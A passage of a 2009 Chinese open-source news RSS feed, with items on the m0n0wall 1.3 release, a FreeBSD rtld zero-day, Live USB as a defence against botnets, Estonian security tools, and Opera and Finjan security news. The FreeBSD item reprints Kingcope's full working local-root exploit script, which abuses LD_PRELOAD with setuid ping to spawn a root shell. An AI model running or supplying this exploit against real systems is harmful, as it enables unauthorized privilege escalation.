			<content:encoded><![CDATA[<p>Manuel Kasper<a href="http://m0n0.ch/wall/list-announce/showmsg.php?id=0/59">宣布m0n0wall 1.3发布</a>，这个版本经过了3年的测试，现在已经非常成熟，用官方的话说，这是一个足够好的产品。 <a href="http://m0n0.ch/wall/">m0n0wall</a> 1.3基于FreeBSD 6.4的 &#8220;bare-bones 版本&#8221; ，提供非常友好的Web界面来管理访问系统，通过PHP语言来实现Web配置防火墙的功能，整个系统通过单个XML文本文件实现配置。m0n0wall 1.3包括支持IPv6，IPsec traffic，IPsec NAT-T，DPD 和动态隧道以及无数的Bug修正和其它性能改善。此前发布的三个不同版本(net45xx, net48xx和wrap)，在m0n0wall 1.3中，合为一体，嵌入式镜像。更多信息可以查看<a href="http://m0n0.ch/wall/changelog.php">m0n0wall更改日志</a>。m0n0wall 1.3的嵌入式镜像和CDROM镜像，普通PCs和虚拟机可以在<a href="http://m0n0.ch/wall/downloads.php">到官方网站上下载</a> 。</p>
<h2>截屏，点击放大</h2>

<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/firewall_nat/' title='firewall_nat'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/firewall_nat-150x150.png" class="attachment-thumbnail" alt="" title="firewall_nat" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/firewall_nat_1to1/' title='firewall_nat_1to1'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/firewall_nat_1to1-150x150.png" class="attachment-thumbnail" alt="" title="firewall_nat_1to1" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/firewall_nat_out/' title='firewall_nat_out'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/firewall_nat_out-150x150.png" class="attachment-thumbnail" alt="" title="firewall_nat_out" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/firewall_rules/' title='firewall_rules'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/firewall_rules-150x150.png" class="attachment-thumbnail" alt="" title="firewall_rules" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/interfaces_lan/' title='interfaces_lan'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/interfaces_lan-150x150.png" class="attachment-thumbnail" alt="" title="interfaces_lan" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/interfaces_opt/' title='interfaces_opt'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/interfaces_opt-150x150.png" class="attachment-thumbnail" alt="" title="interfaces_opt" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/interfaces_wan/' title='interfaces_wan'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/interfaces_wan-150x150.png" class="attachment-thumbnail" alt="" title="interfaces_wan" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/interfaces_wlan/' title='interfaces_wlan'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/interfaces_wlan-150x150.png" class="attachment-thumbnail" alt="" title="interfaces_wlan" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/services_captiveportal/' title='services_captiveportal'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/services_captiveportal-150x150.png" class="attachment-thumbnail" alt="" title="services_captiveportal" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/services_dhcpd/' title='services_dhcpd'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/services_dhcpd-150x150.png" class="attachment-thumbnail" alt="" title="services_dhcpd" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/services_dnsmasq/' title='services_dnsmasq'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/services_dnsmasq-150x150.png" class="attachment-thumbnail" alt="" title="services_dnsmasq" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/services_dyndns/' title='services_dyndns'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/services_dyndns-150x150.png" class="attachment-thumbnail" alt="" title="services_dyndns" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/services_wol/' title='services_wol'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/services_wol-150x150.png" class="attachment-thumbnail" alt="" title="services_wol" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/shaper/' title='shaper'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/shaper-150x150.png" class="attachment-thumbnail" alt="" title="shaper" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/shaper_pipes/' title='shaper_pipes'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/shaper_pipes-150x150.png" class="attachment-thumbnail" alt="" title="shaper_pipes" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/shaper_queues/' title='shaper_queues'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/shaper_queues-150x150.png" class="attachment-thumbnail" alt="" title="shaper_queues" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/status_graph/' title='status_graph'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/status_graph-150x150.png" class="attachment-thumbnail" alt="" title="status_graph" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/status_interfaces/' title='status_interfaces'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/status_interfaces-150x150.png" class="attachment-thumbnail" alt="" title="status_interfaces" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/system/' title='system'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/system-150x150.png" class="attachment-thumbnail" alt="" title="system" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/system_routes/' title='system_routes'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/system_routes-150x150.png" class="attachment-thumbnail" alt="" title="system_routes" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/vpn_ipsec/' title='vpn_ipsec'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/vpn_ipsec-150x150.png" class="attachment-thumbnail" alt="" title="vpn_ipsec" /></a>
<a href='http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/vpn_pptp/' title='vpn_pptp'><img width="150" height="150" src="http://osss.cn/news/wp-content/uploads/2009/12/vpn_pptp-150x150.png" class="attachment-thumbnail" alt="" title="vpn_pptp" /></a>

]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/12/02/%e5%8a%9f%e8%83%bd%e5%bc%ba%e6%82%8d%e7%9a%84m0n0wall-1-3%e9%98%b2%e7%81%ab%e5%a2%99%e5%8f%91%e5%b8%83%e9%99%84%e6%88%aa%e5%b1%8f/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FreeBSD发现本地r00t zeroday漏洞</title>
		<link>http://osss.cn/news/2009/12/02/freebsd%e5%8f%91%e7%8e%b0%e6%9c%ac%e5%9c%b0r00t-zeroday%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://osss.cn/news/2009/12/02/freebsd%e5%8f%91%e7%8e%b0%e6%9c%ac%e5%9c%b0r00t-zeroday%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Wed, 02 Dec 2009 03:25:02 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[FreeBSD]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=3931</guid>
		<description><![CDATA[前不久FreeBSD8.0刚发布，现在就爆出一个危险的漏洞，这个漏洞是充许一般用户获得root权限。这个问题起源于run-time link editor (rtld) ，根据此漏洞的发现者Kingcope所言，这个漏洞很容易被利用，容易的让人难以置信。举个例子，为LD_PRELOAD环境变量设置一个特别的函数库，然后开始SUID程序 。

LD_PRELOAD 指令充许程序在启动之前载入附加的函数库。 在UNIX的动态链接库的世界中，LD_PRELOAD就是这样一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入恶意程序，从而达到那不可告人的罪恶的目的

<span class="readmore"><a href="http://osss.cn/news/2009/12/02/freebsd%e5%8f%91%e7%8e%b0%e6%9c%ac%e5%9c%b0r00t-zeroday%e6%bc%8f%e6%b4%9e/" title="FreeBSD发现本地r00t zeroday漏洞">阅读全文——共1504字</a></span>]]></description>
			<content:encoded><![CDATA[<p><a rel="external" href="http://www.freebsd.org/" target="_blank"><img class="alignleft size-full wp-image-2484" title="freebsd" src="http://osss.cn/news/wp-content/uploads/2009/10/freebsd.png" alt="freebsd" width="107" height="102" />前不久FreeBSD8.0</a>刚发布，现在就爆出一个危险的漏洞，这个漏洞是充许一般用户获得root权限。这个问题起源于run-time link editor (rtld) ，根据此漏洞的发现者Kingcope所言，这个漏洞很容易被利用，容易的让人难以置信。举个例子，为LD_PRELOAD环境变量设置一个特别的函数库，然后开始<a rel="external" href="http://en.wikipedia.org/wiki/Setuid" target="_blank">SUID程序 。</a></p>
<p><a rel="external" href="http://en.wikipedia.org/wiki/Dynamic_linker" target="_blank">LD_PRELOAD</a> 指令充许程序在启动之前载入附加的函数库。 在UNIX的动态链接库的世界中，LD_PRELOAD就是这样一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入恶意程序，从而达到那不可告人的罪恶的目的<span style="font-size: 12pt;"></span></p>
<p>目前受到影响的版本有FreeBSD 8.0和FreeBSD 7.1，不过FreeBSD 6.3和FreeBSD 4.9不受到影响。由于问题的紧急，FreeBSD的安全人员Colin Percival发布了<a rel="external" href="http://people.freebsd.org/%7Ecperciva/rtld.patch" target="_blank">补丁</a>，但并没有发布强制性的警告。Percival指出，这个补丁还不是完整的，我们需要静下心来修改。这个安全人员同时也说道，补丁没有安全测试，我们不能保证是否完全的修正这个漏洞。</p>
<pre style="margin: 0em;">系统测试
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*漏洞利用脚本，复制另存为*.sh文件*
<pre style="margin: 0em;">**********************************</pre>
<p>#!/bin/sh<br />
echo ** FreeBSD local r00t zeroday<br />
echo by Kingcope<br />
echo November 2009<br />
cat &gt; env.c &lt;&lt; _EOF<br />
#include &lt;stdio.h&gt;</p>
<p>main() {<br />
extern char **environ;<br />
environ = (char**)malloc(8096);</p>
<p>environ[0] = (char*)malloc(1024);<br />
environ[1] = (char*)malloc(1024);<br />
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");</p>
<p>execl("/sbin/ping", "ping", 0);<br />
}<br />
_EOF<br />
gcc env.c -o env<br />
cat &gt; program.c &lt;&lt; _EOF<br />
#include &lt;unistd.h&gt;<br />
#include &lt;stdio.h&gt;<br />
#include &lt;sys/types.h&gt;<br />
#include &lt;stdlib.h&gt;</p>
<p>void _init() {<br />
extern char **environ;<br />
environ=NULL;<br />
system("echo ALEX-ALEX;/bin/sh");<br />
}<br />
_EOF<br />
gcc -o program.o -c program.c -fPIC<br />
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles<br />
cp w00t.so.1.0 /tmp/w00t.so.1.0<br />
./env</p>
<pre style="margin: 0em;">**********************************
代码转自：<a href="http://seclists.org/fulldisclosure/2009/Nov/371">seclists.org</a></pre>
</pre>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/12/02/freebsd%e5%8f%91%e7%8e%b0%e6%9c%ac%e5%9c%b0r00t-zeroday%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>袁萌：冲浪宝（Live USB）KO肉鸡电脑</title>
		<link>http://osss.cn/news/2009/11/27/%e8%a2%81%e8%90%8c%ef%bc%9a%e5%86%b2%e6%b5%aa%e5%ae%9d%ef%bc%88live-usb%ef%bc%89ko%e8%82%89%e9%b8%a1%e7%94%b5%e8%84%91/</link>
		<comments>http://osss.cn/news/2009/11/27/%e8%a2%81%e8%90%8c%ef%bc%9a%e5%86%b2%e6%b5%aa%e5%ae%9d%ef%bc%88live-usb%ef%bc%89ko%e8%82%89%e9%b8%a1%e7%94%b5%e8%84%91/#comments</comments>
		<pubDate>Fri, 27 Nov 2009 01:57:46 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[综合评论]]></category>
		<category><![CDATA[趣闻]]></category>
		<category><![CDATA[Live USB]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=3818</guid>
		<description><![CDATA[袁萌教授在他的Blog上发表名为《肉鸡电脑与冲浪宝（Live USB）》的文章，简而言之近期中央电视台播放的法制教育节目提及“黑色产业链”，网络安全导致用户的电脑成为肉鸡，信息被窃。袁老非常生气，于是提出一种可靠的解决方法，便是冲浪宝（袁老发明的一个新名词），其实就是自启动U盘中安装Linux系统。冲浪宝是如何KO肉鸡电脑的呢？请详见袁萌的Blog《肉鸡电脑与冲浪宝（Live USB）》一文，或查看OSSS.CN开源社区编辑的转贴，如下文：

所谓“肉鸡电脑”就是被黑客利用木马手段在远方控制的计算机。除去木马，并非易事。怎么办呢？

<span class="readmore"><a href="http://osss.cn/news/2009/11/27/%e8%a2%81%e8%90%8c%ef%bc%9a%e5%86%b2%e6%b5%aa%e5%ae%9d%ef%bc%88live-usb%ef%bc%89ko%e8%82%89%e9%b8%a1%e7%94%b5%e8%84%91/" title="袁萌：冲浪宝（Live USB）KO肉鸡电脑">阅读全文——共1306字</a></span>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-2987" style="margin-left: 5px; margin-right: 5px;" title="yuanmen" src="http://osss.cn/news/wp-content/uploads/2009/10/yuanmen.jpg" alt="yuanmen" width="70" height="97" />袁萌教授在他的Blog上发表名为<a href="http://blog.sina.com.cn/s/blog_4e8581890100gay1.html">《肉鸡电脑与冲浪宝（Live USB）》</a>的文章，简而言之近期中央电视台播放的法制教育节目提及“黑色产业链”，网络安全导致用户的电脑成为肉鸡，信息被窃。袁老非常生气，于是提出一种可靠的解决方法，便是冲浪宝（袁老发明的一个新名词），其实就是自启动U盘中安装Linux系统。冲浪宝是如何KO肉鸡电脑的呢？请详见袁萌的Blog<a href="http://blog.sina.com.cn/s/blog_4e8581890100gay1.html">《肉鸡电脑与冲浪宝（Live USB）》</a>一文，或查看OSSS.CN开源社区编辑的转贴，如下文：</p>
<blockquote><p>所谓“肉鸡电脑”就是被黑客利用木马手段在远方控制的计算机。除去木马，并非易事。怎么办呢？</p>
<p>此刻，在我的计算机（运行Ubuntu Remix 9.10操作系统）桌面上只剩下了浏览器和办公套件的两个图标（硬盘线已拔掉），非常简洁，以便体验一把谷歌Chrome电脑的乐趣。11月26日，观看中央电视台播放的法制教育节目，提及“黑色产业链”，对犯罪嫌疑人“黑色靓点”的交代十分恼火。黑客利用木马控制用户的电脑之后，当成“肉鸡”在网上出售，广东地区的肉鸡一元人民币一只，港澳地区肉鸡3元一只，外国肉鸡则要10～20元一只。肉鸡被人买去之后，将肉鸡中的银行帐号、游戏货币、游戏设备、QQ货币、密码、个人隐私信息&#8230;&#8230;（行话叫“洗信”）分类打包，再到5173、淘宝网上去公开出售。肉鸡危害如此之大，简直令人毛发直立。据说，国内的黑色产业链的“年产值”可达200亿元人民币。</p>
<p>实际上，黑客把木马偷偷地放在某些网站上，一旦用户访问该网站，往往在不被察觉的情况下就“中招儿”了，被黑客逮住，成为肉鸡。在这种情况下，用户的机密信息和个人隐私当然毫无秘密可言。怎么办呢？</p>
<p>实际情况是，电脑用户利用杀毒软件把木马杀掉。以后，如果再中毒，就再杀掉，如此循环往复，没完没了，&#8230;&#8230;但是，只要你一不留神，不知道在什么时候，你的机密信息就已被黑客偷出去了，而且，很可能被偷盗了不止一次。怎么办呢？</p>
<p>大家知道，“冲浪宝”其实就是Live USB，也叫自启动 U盘。利用“冲浪宝”上网冲浪，绝对不会“中招儿”。有人说，“冲浪宝”不能玩网络游戏。未必。“冲浪宝”可分为不同级别，高、中、低。高级“冲浪宝，什么不能做？”“冲浪宝”的运行机理不是Windows，黑客拿它没有办法。对用户宣传“冲浪宝”，不要说什么Linux系统安全，也不必说Linux系统可靠，只要说它不是Windows操作系统即可。人们担心，“冲浪宝”好用吗？其实，“冲浪宝”就是“光棍”浏览器。有什么不好用的？在我们国内，Linux的名声被搞臭了，没有人稀罕它。实际上，看看Moblin 2.1和Remix 9.10的小模样儿，都怪可爱的。实际上，“冲浪宝”就是一个“光棍”浏览器，功能上根本无法与Win 7比高低，甘拜下风了。前天下午，我去北京中关村电脑大卖场，发现1GB容量的U盘已经停产，一般都是4GB或8GB的U盘。1GB的“冲浪宝”到哪里去找呢？原来，我希望18元钱就可买到一块“冲浪宝”。4GB容量的“冲浪宝”太浪费了。</p>
<p>说明：“冲浪宝”的外形，各色各样，男女有别；“冲浪宝”的技术，根源相同，不分高低；“冲浪宝”的厂商，五湖四海，各显神通。</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/11/27/%e8%a2%81%e8%90%8c%ef%bc%9a%e5%86%b2%e6%b5%aa%e5%ae%9d%ef%bc%88live-usb%ef%bc%89ko%e8%82%89%e9%b8%a1%e7%94%b5%e8%84%91/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Estonia国家网络使用开源安全工具</title>
		<link>http://osss.cn/news/2009/11/25/estonia%e5%9b%bd%e5%ae%b6%e7%bd%91%e7%bb%9c%e4%bd%bf%e7%94%a8%e5%bc%80%e6%ba%90%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7/</link>
		<comments>http://osss.cn/news/2009/11/25/estonia%e5%9b%bd%e5%ae%b6%e7%bd%91%e7%bb%9c%e4%bd%bf%e7%94%a8%e5%bc%80%e6%ba%90%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7/#comments</comments>
		<pubDate>Wed, 25 Nov 2009 01:21:13 +0000</pubDate>
		<dc:creator>osss</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[政府]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=3731</guid>
		<description><![CDATA[爱沙尼亚的一个网络项目，开始使用开源工具来保护国家网络基础设施，这些工具将在欧盟公共许可证(EUPL)下发布。这个项目运行在国家信息中心 (RIA)中，已经使用了若干个开源工具，主要目标是监控国家网络流量以及预防网络问题。

Clarified（与RIA合作的其中一个公司）的CTO Jani Kenttälä说：“在这个项目中，我们使用了很多优秀的开源工具，这些开源我们通过开发后，将返回开源社区”。前二个开源项目计划发布 &#8220;Snort4all&#8221; 和&#8221;Abuse helper&#8221;；Snort4all将用于入侵检查和监控其它的网络事件，而Abuse Helper将帮助CERT Estonia管理网络滥用事件。

]]></description>
			<content:encoded><![CDATA[<p>爱沙尼亚的一个网络项目，开始使用开源工具来保护国家网络基础设施，这些工具将在<a href="http://ec.europa.eu/idabc/eupl">欧盟公共许可证</a>(EUPL)下发布。这个项目运行在<a href="http://www.ria.ee/index.php?lang=en">国家信息中心</a> (RIA)中，已经使用了若干个开源工具，主要目标是监控国家网络流量以及预防网络问题。</p>
<p>Clarified（与RIA合作的其中一个公司）的CTO Jani Kenttälä说：“在这个项目中，我们使用了很多优秀的开源工具，这些开源我们通过开发后，将返回开源社区”。前二个开源项目计划发布 &#8220;Snort4all&#8221; 和&#8221;Abuse helper&#8221;；Snort4all将用于入侵检查和监控其它的网络事件，而Abuse Helper将帮助<a href="http://www.ria.ee/?id=28201">CERT Estonia</a>管理网络滥用事件。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/11/25/estonia%e5%9b%bd%e5%ae%b6%e7%bd%91%e7%bb%9c%e4%bd%bf%e7%94%a8%e5%bc%80%e6%ba%90%e5%ae%89%e5%85%a8%e5%b7%a5%e5%85%b7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Opera 10 :主要的安全更新</title>
		<link>http://osss.cn/news/2009/10/29/opera-10-%e4%b8%bb%e8%a6%81%e7%9a%84%e5%ae%89%e5%85%a8%e6%9b%b4%e6%96%b0/</link>
		<comments>http://osss.cn/news/2009/10/29/opera-10-%e4%b8%bb%e8%a6%81%e7%9a%84%e5%ae%89%e5%85%a8%e6%9b%b4%e6%96%b0/#comments</comments>
		<pubDate>Thu, 29 Oct 2009 12:04:36 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[opera]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=3068</guid>
		<description><![CDATA[Opera 10.01是一个安全和稳定方面的升级，建议所有的用户安装。本次升级是由于一个安全漏洞。在浏览器中处理特定的域名时会导致内存错误，该漏洞可以被用来注入和执行代码。攻击者能够通过恶意软件感染用户的PC机。

Opera把这个漏洞列为“极其严重”。该漏洞可以通过升级得到修复。本次升级还修复了一个欺骗漏洞，能够阻止不受控制的feed对象通过脚本自动订阅Feed，还修复了在用户界面，Email，news和chat功能中的小漏洞。

]]></description>
			<content:encoded><![CDATA[<p><a href="http://osss.cn/news/wp-content/uploads/2009/10/baea2f46f7287a6d.png" rel="wp-prettyPhoto[g3068]"><a href="http://www.h-online.com/imgs/43/4/3/3/1/5/3/baea2f46f7287a6d.png" rel="wp-prettyPhoto[g3068]"><img class="alignleft size-full wp-image-3069" title="baea2f46f7287a6d" src="http://osss.cn/news/wp-content/uploads/2009/10/baea2f46f7287a6d.png" alt="baea2f46f7287a6d" width="195" height="142" /></a></a><a href="http://www.opera.com/">Opera 10.01</a>是一个安全和稳定方面的升级，建议所有的用户安装。本次升级是由于一个安全漏洞。在浏览器中处理特定的域名时会导致内存错误，该漏洞可以被用来注入和执行代码。攻击者能够通过恶意软件感染用户的PC机。</p>
<p>Opera把这个漏洞列为“极其严重”。该漏洞可以通过升级得到修复。本次升级还修复了一个欺骗漏洞，能够阻止不受控制的feed对象通过脚本自动订阅Feed，还修复了在用户界面，Email，news和chat功能中的小漏洞。</p>
]]></content:encoded>
			<wfw:commentRss>http://osss.cn/news/2009/10/29/opera-10-%e4%b8%bb%e8%a6%81%e7%9a%84%e5%ae%89%e5%85%a8%e6%9b%b4%e6%96%b0/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>安全专家Finjan提供云产品</title>
		<link>http://osss.cn/news/2009/10/22/%e5%ae%89%e5%85%a8%e4%b8%93%e5%ae%b6finjan%e6%8f%90%e4%be%9b%e4%ba%91%e4%ba%a7%e5%93%81/</link>
		<comments>http://osss.cn/news/2009/10/22/%e5%ae%89%e5%85%a8%e4%b8%93%e5%ae%b6finjan%e6%8f%90%e4%be%9b%e4%ba%91%e4%ba%a7%e5%93%81/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 11:57:23 +0000</pubDate>
		<dc:creator>kevin_w</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[软件]]></category>
		<category><![CDATA[Finjan，Cloud]]></category>

		<guid isPermaLink="false">http://osss.cn/news/?p=2953</guid>
		<description><![CDATA[Finjan的新产品Vital Cloud和Vital Cloud hybrid 旨在为Managed Security Service Providers(MSSPs)和在偏远地区的企业提供web计算安全。在这方面的关键是敏感数据存储在企业网络而不是云中。Vital Cloud扩展了Finjan的Unified Web Security包，包含了一个组件可以连接到Amonzon的Elastic Compute Cloud(EC2).

据说联合的安全套件可以保护公司员工(不管你在什么地方工作)免受恶意软件和病毒的攻击。管理员可以用Vital Cloud中心的终端，控制和监视远端的设备就像病毒扫描器一样。Vital Cloud Hybrid提供了在云中从on-premise web安全到web安全的转换。Finjan的产品是基于一个专有的，专利的分析过程，能够在转换期间检查数据。如果有需要，在几分钟内管理员就可以添加额外的web扫描工具。

]]></description>
